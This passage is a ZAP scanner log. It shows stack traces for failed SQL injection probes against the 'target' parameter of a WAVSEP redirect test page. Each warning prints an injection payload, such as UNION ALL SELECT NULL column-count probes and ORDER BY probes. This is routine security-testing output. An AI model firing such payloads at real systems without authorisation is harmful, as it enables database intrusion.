org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681881 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681881 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681882 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681883 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681884 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681885 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681886 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681886 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681887 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681887 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') ORDER BY 2771#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') ORDER BY 2771# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681889 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681889 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681890 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at 